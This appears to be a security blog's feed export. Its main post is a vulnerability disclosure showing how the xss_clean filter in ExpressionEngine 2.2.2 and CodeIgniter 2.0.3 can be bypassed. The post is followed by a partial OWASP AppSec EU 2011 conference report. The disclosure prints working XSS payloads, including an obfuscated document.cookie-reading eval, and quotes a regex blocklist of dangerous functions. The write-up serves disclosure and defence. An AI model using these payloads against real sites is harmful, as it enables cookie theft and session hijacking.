tag:blogger.com,1999:blog-37804477113939064952024-03-19T05:10:43.987-07:00Secure.App.DevSecure Application Development & TestingMarian Ventuneachttp://www.blogger.com/profile/03480456874989143556noreply@blogger.comBlogger5125tag:blogger.com,1999:blog-3780447711393906495.post-48759218817531393822011-11-27T11:26:00.000-08:002011-11-28T15:38:54.261-08:00EllisLab xss_clean Filter Bypass - ExpressionEngine and CodeIgniter<span style="font-size:100%;"><span style="font-family:arial;"><br /><br />EllisLab ExpressionEngine 2.2.2 (<a style="font-weight: bold; color: rgb(0, 0, 102);" href="http://expressionengine.com/">http://expressionengine.com</a>) and CodeIgniter 2.0.3 (<a style="font-weight: bold; color: rgb(0, 0, 102);" href="http://codeigniter.com/">http://codeigniter.com</a>) were recently found vulnerable to XSS attacks (<a style="font-weight: bold; color: rgb(0, 0, 102);" href="http://www.ventuneac.net/security-advisories/MVSA-11-013">MVSA_11_013</a>). Due to design&implementation flaws affecting CI_Security class, the built-in XSS protection provided by xss_clean filter can be easily bypassed as detailed below.</span></span><span style=";font-family:arial;font-size:100%;" ><br /></span><br /><span style=";font-family:arial;font-size:100%;" ><span style="font-family:arial;">Successful bypass of xss_clean filter was shown on a custom PHP application built using CodeIgniter PHP framework version 2.0.3. No user input validation rules were implemented/enabled, and global_xss_filtering was set to TRUE.</span><br /><br /></span><span style="font-family:arial;">Test environment: Apache HTTP Server 2.2.16, PHP 5.3.3, MySql 5.1.49</span><span style=";font-family:arial;font-size:100%;" ><br /><br /><br /><span style="font-weight: bold;">1. _remove_evil_attributes function flaw</span>s<br /><br /></span><span style="font-family:arial;">As implemented for ExpressionEngine 2.2.2 and CodeIgniter 2.0.3, _remove_evil_attributes function of CI_Security class allows detection and removal of 'evil' on* event attributes (e.g. onmouseover, onfocus, etc) from any HTML tag submitted as a parameter of GET or POST requests. In most of the cases, this works fine - except when it doesn't, as detailed below</span><span style=";font-family:arial;font-size:100%;" ><br /><br /><span style="font-weight: bold;">1.1 on* event attributes submitted outside an HTML tag are not filtered out</span><br /><br /><br /><span style="font-weight: bold;">1.2 on* event attributes submitted as part of an HTML tag are removed</span><br /><br /><br /></span> <span style="color: rgb(102, 102, 102);font-family:arial;" >XSS payload: <a href=”#” onclick=”alert(1)”></span><span style="color: rgb(102, 102, 102);font-family:arial;font-size:100%;" ><br /><br /><span style="color: rgb(102, 102, 102);"><span class="blsp-spelling-error" id="SPELLING_ERROR_21"><span class="blsp-spelling-error" id="SPELLING_ERROR_21"></span></span></span></span><span style="color: rgb(102, 102, 102);font-family:arial;" >xss_clean filtered output: <a href=”#”></span><span style=";font-family:arial;font-size:100%;" ><br /><br /><br />Thus, the 'evil' on* event attribute is removed from the HTML tag containing it. However, the character preceding the on* event attribute is also removed, which leads to crafting the following payload:<br /><br /><br /><span style="color: rgb(102, 102, 102);"><span class="blsp-spelling-error" id="SPELLING_ERROR_24"><span class="blsp-spelling-error" id="SPELLING_ERROR_24"></span></span></span></span><span style="color: rgb(102, 102, 102);font-family:arial;" >XSS payload: <a href=”#”onclick=”alert(1)”></span><br /><br /><span style="color: rgb(102, 102, 102);font-family:arial;" >xss_clean filtered output: <a href=”#></span><span style=";font-family:arial;font-size:100%;" ><br /><br /><br />When there is no space between the value of a previous attribute (enclosed by double_quotes) and the injected on*event attribute, the double quotes closing the value of preceding<br />attribute (<span class="blsp-spelling-error" id="SPELLING_ERROR_31"><span class="blsp-spelling-error" id="SPELLING_ERROR_31"></span></span></span><span style="font-family:arial;">href i</span><span style=";font-family:arial;font-size:100%;" >n our example) is removed together with the 'evil' on* attribute.<br /><br /><br /><span style="font-weight: bold;">2. </span></span><span style="font-weight: bold;font-family:arial;" >xss</span><span style=";font-family:arial;font-size:100%;" ><span style="font-weight: bold;">_clean function flaw</span><br /><br /><span style="font-weight: bold;">2.1 unsafe usage of HTML entities</span><br /><br /><span class="blsp-spelling-error" id="SPELLING_ERROR_33"><span class="blsp-spelling-error" id="SPELLING_ERROR_33"></span></span></span><span style="font-family:arial;">xss</span><span style=";font-family:arial;font-size:100%;" >_clean function includes functionality to replace any detected ( and ) characters with the corresponding HTML entities, as shown below:<br /><br /><br /><span style="color: rgb(102, 102, 102);">-- code from </span></span><span style="color: rgb(102, 102, 102);font-family:arial;" >xss</span><span style="color: rgb(102, 102, 102);font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">_clean function </span></span><span style="color: rgb(102, 102, 102);font-family:arial;" >EE </span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);"><span style="color: rgb(102, 102, 102);font-family:arial;" >2</span>.2.2 / CI 2.0.3 - start --</span><br /><span style="color: rgb(102, 102, 102);">/*</span><br /><span style="color: rgb(102, 102, 102);"> * Sanitize naughty scripting elements</span><br /><span style="color: rgb(102, 102, 102);"> *</span><br /><span style="color: rgb(102, 102, 102);"> * Similar to above, only instead of looking for</span><br /><span style="color: rgb(102, 102, 102);"> * tags it looks for </span></span><span style="color: rgb(102, 102, 102);font-family:arial;" >PHP </span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">and JavaScript commands</span><br /><span style="color: rgb(102, 102, 102);"> * that are disallowed. Rather than removing the</span><br /><span style="color: rgb(102, 102, 102);"> * code, it simply converts the parenthesis to entities</span><br /><span style="color: rgb(102, 102, 102);"> * rendering the code </span></span><span style="color: rgb(102, 102, 102);font-family:arial;" >un</span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">-executable.</span><br /><span style="color: rgb(102, 102, 102);"> *</span><br /><span style="color: rgb(102, 102, 102);"> * For example: </span></span><span style="color: rgb(102, 102, 102);font-family:arial;" > eval</span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">('some code')</span><br /><span style="color: rgb(102, 102, 102);"> * Becomes: </span></span><span style="font-family:arial;"> eval</span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">('some code')</span><br /><span style="color: rgb(102, 102, 102);"> */</span><br /><span style="color: rgb(102, 102, 102);"> $<span class="blsp-spelling-error" id="SPELLING_ERROR_40"><span class="blsp-spelling-error" id="SPELLING_ERROR_40"></span></span></span></span><span style="color: rgb(102, 102, 102);font-family:arial;" >str = preg</span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">_replace('#(alert|<span class="blsp-spelling-error" id="SPELLING_ERROR_42"><span class="blsp-spelling-error" id="SPELLING_ERROR_42"></span></span></span></span><span style="color: rgb(102, 102, 102);font-family:arial;" >cmd|passthru|eval|exec|expression|system|fopen|fsockopen|file|file_get_contents|readfile|unlink)(\s*)\((.*?)\)#si', "\\1\\2(\\3)", $str</span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">);</span><br /><br /><span style="color: rgb(102, 102, 102);">-- code from <span class="blsp-spelling-error" id="SPELLING_ERROR_50"><span class="blsp-spelling-error" id="SPELLING_ERROR_50"></span></span></span></span><span style="color: rgb(102, 102, 102);font-family:arial;" >xss_clean function EE </span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">2.2.2 / CI 2.0.3 - end --</span><br /><br /><br />This works fine when the code to be sanitised (e.g. alert(), event(), etc) is not located as part of any attribute (including on* event attributes) of the HTML tag (e.g. </span><span style="font-family:arial;"><</span><span style=";font-family:arial;font-size:100%;" >script> alert&#40;0&#41; </span><span style="font-family:arial;"><</span><span style=";font-family:arial;font-size:100%;" >/script>).<br /><br />When the code to be sanitised is part of an attribute of an HTML tag (e.g. </span><span style="font-family:arial;"><</span><span style=";font-family:arial;font-size:100%;" >;img onmouseover</span><span style=";font-family:arial;font-size:100%;" ><span class="blsp-spelling-error" id="SPELLING_ERROR_56"><span class="blsp-spelling-error" id="SPELLING_ERROR_56"></span></span>="alert</span><span style=";font-family:arial;font-size:100%;" >&#40;</span><span style=";font-family:arial;font-size:100%;" >111</span><span style=";font-family:arial;font-size:100%;" >&#41;</span><span style=";font-family:arial;font-size:100%;" >">), the CI_Security code above does little (if anything) to protect against XSS attacks.<br /><br /><br /><span style="font-weight: bold;">Putting it all together</span><br /><br />When we combine the flaws detailed in sections 1 and 2, we can successfully bypass XSS filtering provided by xss_clean function, as shown below.<br /><br /><span style="color: rgb(102, 102, 102);"><br />XSS payload: </span></span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);"><</span></span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);"></span></span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">a href="#"onclick="alert(1)"</span></span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">></span></span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">" onclick="alert(2)"</span></span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">>aa</span></span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);"><</span></span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">/a</span></span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">></span></span><span style=";font-family:arial;font-size:100%;" ><br /><span style="color: rgb(102, 102, 102);"><br />xss_clean 'filtered' output: </span></span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);"><</span></span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">a href="#</span></span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">></span></span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">" onclick="alert</span></span><span style="color: rgb(102, 102, 102);font-family:arial;font-size:100%;" >&#40;</span><span style="color: rgb(102, 102, 102);font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">2</span></span><span style="color: rgb(102, 102, 102);font-family:arial;font-size:100%;" >&#41;</span><span style="color: rgb(102, 102, 102);font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">">aa</span></span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);"><</span></span><span style="color: rgb(102, 102, 102);font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">/a</span></span><span style="color: rgb(102, 102, 102);font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">></span></span><span style=";font-family:arial;font-size:100%;" ><br /><br /><span style=";font-family:arial;font-size:100%;" >Exploitation of the above flaws also allowed bypassing additional XSS prevention rules provided by xss_clean filter, including the usage of document.cookie as part of injected XSS payloads:<br /><br /><br /><span style="color: rgb(102, 102, 102);font-family:arial;" >... </span></span></span><!--[if gte mso 9]><xml> <w:worddocument> <w:view>Normal</w:View> <w:zoom>0</w:Zoom> <w:trackmoves/> <w:trackformatting/> <w:punctuationkerning/> <w:validateagainstschemas/> <w:saveifxmlinvalid>false</w:SaveIfXMLInvalid> <w:ignoremixedcontent>false</w:IgnoreMixedContent> <w:alwaysshowplaceholdertext>false</w:AlwaysShowPlaceholderText> <w:donotpromoteqf/> <w:lidthemeother>EN-GB</w:LidThemeOther> <w:lidthemeasian>X-NONE</w:LidThemeAsian> <w:lidthemecomplexscript>X-NONE</w:LidThemeComplexScript> <w:compatibility> <w:breakwrappedtables/> <w:snaptogridincell/> <w:wraptextwithpunct/> <w:useasianbreakrules/> <w:dontgrowautofit/> <w:splitpgbreakandparamark/> <w:dontvertaligncellwithsp/> <w:dontbreakconstrainedforcedtables/> <w:dontvertalignintxbx/> <w:word11kerningpairs/> <w:cachedcolbalance/> </w:Compatibility> <w:donotoptimizeforbrowser/> <m:mathpr> <m:mathfont val="Cambria Math"> <m:brkbin val="before"> <m:brkbinsub val="--"> <m:smallfrac val="off"> <m:dispdef/> <m:lmargin val="0"> <m:rmargin val="0"> <m:defjc val="centerGroup"> <m:wrapindent val="1440"> <m:intlim val="subSup"> <m:narylim val="undOvr"> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:latentstyles deflockedstate="false" defunhidewhenused="true" defsemihidden="true" defqformat="false" defpriority="99" latentstylecount="267"> <w:lsdexception locked="false" priority="0" semihidden="false" unhidewhenused="false" qformat="true" name="Normal"> <w:lsdexception locked="false" priority="9" semihidden="false" unhidewhenused="false" qformat="true" name="heading 1"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 2"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 3"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 4"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 5"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 6"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 7"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 8"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 9"> <w:lsdexception locked="false" priority="39" name="toc 1"> <w:lsdexception locked="false" priority="39" name="toc 2"> <w:lsdexception locked="false" priority="39" name="toc 3"> <w:lsdexception locked="false" priority="39" name="toc 4"> <w:lsdexception locked="false" priority="39" name="toc 5"> <w:lsdexception locked="false" priority="39" name="toc 6"> <w:lsdexception locked="false" priority="39" name="toc 7"> <w:lsdexception locked="false" priority="39" name="toc 8"> <w:lsdexception locked="false" priority="39" name="toc 9"> <w:lsdexception locked="false" priority="35" qformat="true" name="caption"> <w:lsdexception locked="false" priority="10" semihidden="false" unhidewhenused="false" qformat="true" name="Title"> <w:lsdexception locked="false" priority="1" name="Default Paragraph Font"> <w:lsdexception locked="false" priority="11" semihidden="false" unhidewhenused="false" qformat="true" name="Subtitle"> <w:lsdexception locked="false" priority="22" semihidden="false" unhidewhenused="false" qformat="true" name="Strong"> <w:lsdexception locked="false" priority="20" semihidden="false" unhidewhenused="false" qformat="true" name="Emphasis"> <w:lsdexception locked="false" priority="59" semihidden="false" unhidewhenused="false" name="Table Grid"> <w:lsdexception locked="false" unhidewhenused="false" name="Placeholder Text"> <w:lsdexception locked="false" priority="1" semihidden="false" unhidewhenused="false" qformat="true" name="No Spacing"> <w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading"> <w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List"> <w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid"> <w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1"> <w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2"> <w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1"> <w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2"> <w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1"> <w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2"> <w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3"> <w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List"> <w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading"> <w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List"> <w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid"> <w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 1"> <w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 1"> <w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 1"> <w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 1"> <w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 1"> <w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 1"> <w:lsdexception locked="false" unhidewhenused="false" name="Revision"> <w:lsdexception locked="false" priority="34" semihidden="false" unhidewhenused="false" qformat="true" name="List Paragraph"> <w:lsdexception locked="false" priority="29" semihidden="false" unhidewhenused="false" qformat="true" name="Quote"> <w:lsdexception locked="false" priority="30" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Quote"> <w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 1"> <w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 1"> <w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 1"> <w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 1"> <w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 1"> <w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 1"> <w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 1"> <w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 1"> <w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 2"> <w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 2"> <w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 2"> <w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 2"> <w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 2"> <w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 2"> <w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 2"> <w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 2"> <w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 2"> <w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 2"> <w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 2"> <w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 2"> <w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 2"> <w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 2"> <w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 3"> <w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 3"> <w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 3"> <w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 3"> <w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 3"> <w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 3"> <w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 3"> <w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 3"> <w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 3"> <w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 3"> <w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 3"> <w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 3"> <w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 3"> <w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 3"> <w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 4"> <w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 4"> <w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 4"> <w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 4"> <w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 4"> <w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 4"> <w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 4"> <w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 4"> <w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 4"> <w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 4"> <w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 4"> <w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 4"> <w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 4"> <w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 4"> <w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 5"> <w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 5"> <w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 5"> <w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 5"> <w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 5"> <w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 5"> <w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 5"> <w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 5"> <w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 5"> <w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 5"> <w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 5"> <w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 5"> <w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 5"> <w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 5"> <w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 6"> <w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 6"> <w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 6"> <w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 6"> <w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 6"> <w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 6"> <w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 6"> <w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 6"> <w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 6"> <w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 6"> <w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 6"> <w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 6"> <w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 6"> <w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 6"> <w:lsdexception locked="false" priority="19" semihidden="false" unhidewhenused="false" qformat="true" name="Subtle Emphasis"> <w:lsdexception locked="false" priority="21" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Emphasis"> <w:lsdexception locked="false" priority="31" semihidden="false" unhidewhenused="false" qformat="true" name="Subtle Reference"> <w:lsdexception locked="false" priority="32" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Reference"> <w:lsdexception locked="false" priority="33" semihidden="false" unhidewhenused="false" qformat="true" name="Book Title"> <w:lsdexception locked="false" priority="37" name="Bibliography"> <w:lsdexception locked="false" priority="39" qformat="true" name="TOC Heading"> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]> <style> /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-qformat:yes; mso-style-parent:""; mso-padding-alt:0cm 5.4pt 0cm 5.4pt; mso-para-margin:0cm; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-fareast-font-family:"Times New Roman"; mso-fareast-theme-font:minor-fareast; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin;} </style> <![endif]--><span style="font-size:100%;"><span style="color: rgb(102, 102, 102);font-family:arial;font-size:11pt;" >onmouseover="var a=eval</span></span><span style="color: rgb(102, 102, 102);font-family:arial;font-size:100%;" >&</span><span style="font-size:100%;"><span style="color: rgb(102, 102, 102);font-family:arial;font-size:11pt;" >#x28'do'+'cument'+'.'+'coo'+'kie'</span></span><span style="color: rgb(102, 102, 102);font-family:arial;font-size:100%;" >&</span><span style="font-size:100%;"><span style="color: rgb(102, 102, 102);font-family:arial;font-size:11pt;" >#x29;;alert</span></span><span style="color: rgb(102, 102, 102);font-family:arial;font-size:100%;" >&</span><span style="font-size:100%;"><span style="color: rgb(102, 102, 102);font-family:arial;font-size:11pt;" >#x28;a</span></span><span style="color: rgb(102, 102, 102);font-family:arial;font-size:100%;" >&</span><span style="font-size:100%;"><span style="color: rgb(102, 102, 102);font-family:arial;font-size:11pt;" >#x29;" </span></span><br /><span style=";font-family:arial;font-size:100%;" ><span style=";font-family:arial;font-size:100%;" ><br />Additionally, exploitation of the flaws identified in xss_clean filter allowed compromising the provided CSRF protection as well.<br /><br />Based on the feedback I received from </span></span><span style=";font-family:arial;font-size:100%;" >EllisLab </span><span style=";font-family:arial;font-size:100%;" >on this matters</span><span style=";font-family:arial;font-size:100%;" >, improved xss_clean filtering</span><span style=";font-family:arial;font-size:100%;" > is provided in the latest versions of </span><span style=";font-family:arial;font-size:100%;" >ExpressionEngine </span><span style=";font-family:arial;font-size:100%;" >and </span><span style=";font-family:arial;font-size:100%;" >CodeIgniter </span><span style=";font-family:arial;font-size:100%;" ><span style=";font-family:arial;font-size:100%;" >products.</span><br /><br /><br /></span>Marian Ventuneachttp://www.blogger.com/profile/03480456874989143556noreply@blogger.com18tag:blogger.com,1999:blog-3780447711393906495.post-53651694758863488072011-06-12T12:38:00.000-07:002011-11-27T14:10:28.734-08:00OWASP AppSec EU 2011<span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" ><br /><br />OWASP AppSec EU 2011 (<a style="font-weight: bold;" href="http://appseceu.org/">http://appseceu.org</a>) was held in Dublin, Ireland between 7th and 10th of June. With a great selection of international presenters and with a good mix of IS professionals and developers, I can say (and I am not the only one) the conference was a success.<br /><br />As for any major AppSec event, there is only a limited number of events you can effectively participate to. Between Defend, Prevent and Attack series of presentations, I followed the latter one as briefly summarized below.<br /></span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" ><strong><strong><br /><span style="font-weight: bold;">Designing, Building and Testing Secure Application on Mobile Devices </span></strong></strong>training session held by Dan Cornell from Denim Group on 8th of June was a great introduction to security for mobile and smartphone applications. Dan introduced a threat model for smartphone applications which was used to analyze security of iOS and Android applications. A variety of open source tools were used as part of the hands-on applications analysis. While the course introduced techniques for analyzing mobile applications, it also provided recommendations on avoiding known security issues as part of the development of new smartphone applications. I guess there were not many design considerations discussed, this might be included in the next version of the course. Overall, an excellent course which will hopefully contribute to an increased awareness on building secure smartphone application. Highly recommended.<br /><br />The plenary sessions started on 9th of June. Brad Arkin, senior director of product security and privacy at Adobe opened the session by presenting on various aspects of Adobe's security program - <span style="font-weight: bold;">The Adobe Security Product Lifecycle</span>. An interesting presentation, especially on the green/brown/black belt approach to certifying expertise of security engineers, and their responsibilities inside the company.<br /><br />While I was looking forward for the first session of presentations (including Practical Browser Sandboxing on Windows with Chromium and Building a Robust Security Plan), I took the opportunity instead to catch up with some of the conference organizers (Eoin Keary and Fabio Cerullo), as well as having a quick chat with Tom Brennan about <a href="https://www.owasp.org/index.php/OWASP_Security_Baseline_Project"><span style="font-weight: bold;">OWASP Security Baseline</span></a><span style="color: rgb(0, 0, 102);"><span><span style="color: rgb(0, 0, 0);"> <span style="color: rgb(51, 51, 51);"></span></span></span></span></span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" >project (details available below).</span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" ><span style="color: rgb(0, 0, 102);"><span><span style="color: rgb(0, 0, 0);"><span style="color: rgb(51, 51, 51);"></span></span></span></span><br /><br />Back in the presentation room for the Attack track, Joe Basirico from Security Innovation had an entertaining presentation on Web Applications fuzzing - <span style="font-weight: bold;">The Buzz About Fuzz: an enhanced approach to finding vulnerabilities</span>. Pros and cons of common automated testing for 